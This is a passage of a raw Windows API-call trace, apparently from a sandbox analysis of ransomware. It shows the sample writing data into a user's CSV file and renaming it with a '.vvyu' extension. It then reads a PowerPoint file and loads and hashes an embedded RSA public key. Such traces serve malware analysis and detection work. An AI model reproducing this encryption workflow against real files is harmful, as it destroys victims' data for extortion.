dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b10 [0194.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0194.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b40 [0194.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2ae0 [0194.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0194.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0194.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0194.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0194.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b40 | out: hHeap=0x620000) returned 1 [0194.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0194.279] GetCurrentThreadId () returned 0x66c [0194.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9fd10 [0194.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0194.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.280] GetCurrentThreadId () returned 0x66c [0194.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac90 [0194.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b10 [0194.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ae0 [0194.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0194.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b40 [0194.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ab0 [0194.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b58 [0194.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0194.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b28 [0194.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b70 [0194.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b28 [0194.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0194.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ae0 [0194.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0194.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0194.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0194.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b40 | out: hHeap=0x620000) returned 1 [0194.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0194.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2af8 | out: hHeap=0x620000) returned 1 [0194.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0eb8 | out: hHeap=0x620000) returned 1 [0194.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0194.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.291] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x6a1b, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x6a1b, lpOverlapped=0x0) returned 1 [0194.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.292] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x6a20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.292] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.293] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.294] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.294] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.294] CloseHandle (hObject=0x568) returned 1 [0194.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea3a68 [0194.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.297] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\zlIY3__yM6-.csv" (normalized: "c:\\users\\keecfmwgj\\documents\\zliy3__ym6-.csv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\zlIY3__yM6-.csv.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\zliy3__ym6-.csv.vvyu")) returned 1 [0194.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.299] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.301] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40772ed0, ftCreationTime.dwHighDateTime=0x1d86c6c, ftLastAccessTime.dwLowDateTime=0x7ba045a0, ftLastAccessTime.dwHighDateTime=0x1d89408, ftLastWriteTime.dwLowDateTime=0x7ba045a0, ftLastWriteTime.dwHighDateTime=0x1d89408, nFileSizeHigh=0x0, nFileSizeLow=0x17e70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_3Wl5D4o0g2MKtP.pptx", cAlternateFileName="_3WL5D~1.PPT")) returned 1 [0194.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0eb8 [0194.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0194.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0eb8 | out: hHeap=0x620000) returned 1 [0194.302] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\_3Wl5D4o0g2MKtP.pptx") returned=".pptx" [0194.302] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_3Wl5D4o0g2MKtP.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\_3wl5d4o0g2mktp.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.303] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=97904) returned 1 [0194.303] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.306] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x17e4a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.306] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.309] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.309] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x17e70, lpOverlapped=0x0) returned 1 [0194.310] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.310] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.310] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.310] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.311] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.311] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.311] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.311] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.312] GetLastError () returned 0x0 [0194.312] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.312] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.312] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.312] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.312] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x17e70) returned 0x2ea79b0 [0194.313] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0eb8 [0194.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2af8 [0194.314] 